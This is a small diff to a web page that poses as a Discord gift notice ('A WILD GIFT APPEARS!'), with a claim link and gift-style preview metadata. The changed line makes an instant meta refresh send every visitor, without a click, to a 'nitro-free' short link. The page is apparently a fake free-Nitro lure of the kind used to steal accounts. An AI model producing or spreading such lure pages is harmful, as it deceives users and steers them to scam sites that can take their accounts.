--- a/index.html
+++ b/index.html
@@ -7,5 +7,5 @@
     [CLAIM](https://discord.gg/7GJ9GGmg2W) '>
     <meta property="og:image" content="https://media.discordapp.net/attachments/815951822195392523/868007203561435186/download_12.jpeg" />
   <title>A WILD GIFT APPEARS!</title>
-    <meta http-equiv="refresh" content="0; url=https://discord.com/invite/7GJ9GGmg2W" />
+    <meta http-equiv="refresh" content="0; url=https://dsc.gg/nitro-free" />
 </html>
